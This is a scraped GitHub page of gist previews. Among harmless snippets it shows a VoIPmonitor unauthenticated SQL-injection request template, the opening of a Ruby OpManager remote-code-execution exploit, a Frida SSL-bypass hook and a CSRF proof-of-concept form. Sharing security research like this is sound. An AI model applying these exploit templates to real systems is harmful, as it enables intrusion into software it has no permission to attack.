Skip to content

Instantly share code, notes, and snippets.

View mirhatx's full-sized avatar
🎯
Focusing

Mirhat Yaşar mirhatx

🎯
Focusing
43 followers · 127 following
View GitHub Profile
@kconner
kconner / macOS Internals.md
Last active October 21, 2025 15:03
macOS Internals

macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

@divinepwner
divinepwner / voipmonitor.md
Created April 28, 2021 19:33
voipmonitor unauth sql injection

sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@divinepwner
divinepwner / opManager-Clickbait-Exploit.rb
Created February 16, 2021 19:18
OpManager Authenticated Remote Code Execution
require 'optparse'
require 'net/http'
require 'mime/types'
require 'uri'
def make_request (uri, header = {}, post_body = "")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Post.new(uri.request_uri, header)
request.body = post_body
response = http.request(request)
@ignis-sec
ignis-sec / cold.sh
Created February 9, 2021 20:46
cold.zsh-theme
flame='\xF0\x9F\x94\xA5' #🔥
snow='\xE2\x9D\x84 ' #
gear='\xE2\x9A\x99\xEF\xB8\x8F'
ignis_color='048'
SEGMENT_SEPARATOR=$'\ue0b0'
prompt_segment() {
local bg fg
@ignis-sec
ignis-sec / bb-foxyproxy-pattern.json
Created June 24, 2020 09:06
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
{
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,
@mksglu
mksglu / sozcu.disable-popup.js
Created May 31, 2020 10:49
Sözcü'de bazen okumak istediğim bir haber olduğunda ısrarla karşıma çıkan popup'un ağzını yüzünü kıran bir kod parçası.
var p=Array.prototype.slice.call(document.querySelectorAll(".fc-ab-root"));p.forEach(function(o){o.parentNode.removeChild(o)}),document.body.style.overflow="auto";
@eybisi
eybisi / frida.vim
Last active February 19, 2025 22:25
vim frida codeblock builder
command! -nargs=+ FridaV call FridaV(<f-args>)
command! -nargs=+ Frida call Frida(<f-args>)
function! FridaV( ... )
let class = split(a:1,"\\V.")
let last = class[len(class)-1]
let S = ":normal i"
let S .= "\tvar %s = Java.use(\"%s\")\n"
execute printf(S,last,a:1)
call Frida(last,a:2,a:3)
@eybisi
eybisi / hooky.js
Created April 18, 2020 20:59
hookymooky.js
// install package with adb install package.name
// do not open application
// use -f force option
// frida -U -f package.name -l del.js
Java.perform(function() {
var ssl = Java.use("k.x$b")
var channel = Java.use("f.e.c.b.g.f.g.a.c")
var Integer = Java.use("java.lang.Integer");
var ArrayList = Java.use("java.util.ArrayList");
var ArrayList = Java.use("java.util.ArrayList");
@ademilter
ademilter / form.html
Created March 20, 2020 13:42
7) form elemanlarını stillendirelim
<html>
<head>
<title>Form ve Elemanları</title>
<link rel="stylesheet" href="main.css" />
</head>
<body>
<!--
- adı *
@InsiderPhD
InsiderPhD / csrf-attack_csrf.html
Last active March 12, 2024 08:49
CSRF PoC Example for YT
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form id = "csrf_form" method = "POST" action = "http://127.0.0.1:8000/user/name">
<input type = "text" name = "name" value = "hhh">
<form>